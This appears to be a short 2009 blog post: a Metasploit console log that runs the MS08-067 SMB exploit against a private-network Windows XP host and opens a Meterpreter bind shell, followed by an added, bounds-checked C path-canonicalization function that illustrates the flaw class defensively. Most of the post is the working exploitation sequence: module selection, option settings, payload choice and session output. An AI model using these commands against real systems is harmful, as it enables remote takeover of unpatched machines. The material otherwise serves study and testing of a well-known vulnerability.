msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi
Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Provided by:
hdm
Available targets:
Id  Name
--  ----
0   Windows XP SP2 English (DEP)
1   Windows XP SP3 English (DEP)
2   Windows 2003 SP0 English (NO DEP)
3   Windows 2003 SP2 English (NO DEP)
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 7 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing DEP on some operating systems and service
packs. The correct target must be used to prevent the Server Service
(along with a dozen others in the same process) from crashing.
Windows XP targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full
support for DEP bypass on 2003, along with other platforms, is still
in development.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)
meterpreter > sysinfo
Computer: Research-1
OS : Windows XP (Build 2600, Service Pack 2).
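The module description above names the defect class (a parsing flaw in path canonicalization) without showing it. The following is an added, constructed illustration and not the NetAPI32.dll code or anything from the Metasploit module: a bounds-checked canonicalizer that walks backslash-separated components and refuses to let ".." pop past the root of the output buffer, which is the check a secure implementation of this routine must make.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Constructed illustration, not the NetAPI32.dll routine: canonicalize a
 * backslash-separated path into out (capacity outcap).  "." is dropped,
 * ".." removes the previous component, and ".." at the root is rejected
 * rather than being allowed to move the write position before out[0].
 * Returns true on success, false if the path escapes the root or the
 * result does not fit. */
bool canon_path(const char *in, char *out, size_t outcap)
{
    size_t len = 0;                 /* bytes written to out so far */
    const char *p = in;
    if (outcap < 2) return false;   /* need room for at least "\" + NUL */
    while (*p) {
        /* isolate the next component */
        const char *start = p;
        while (*p && *p != '\\') p++;
        size_t clen = (size_t)(p - start);
        if (*p == '\\') p++;        /* consume the separator */
        if (clen == 0 || (clen == 1 && start[0] == '.'))
            continue;               /* empty component or "." : no change */
        if (clen == 2 && start[0] == '.' && start[1] == '.') {
            /* ".." : pop the previous component, never past the root.
             * An unchecked version would keep decrementing below out[0]. */
            if (len == 0) return false;
            while (len > 0 && out[len - 1] != '\\') len--;
            if (len > 0) len--;     /* drop that component's separator too */
            continue;
        }
        /* ordinary component: needs "\" + component + NUL */
        if (len + 1 + clen + 1 > outcap) return false;
        out[len++] = '\\';
        memcpy(out + len, start, clen);
        len += clen;
    }
    if (len == 0) out[len++] = '\\'; /* everything cancelled out: root */
    out[len] = '\0';
    return true;
}
```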
MS08-067
Friday, September 11, 2009, 5:57 AM
matthews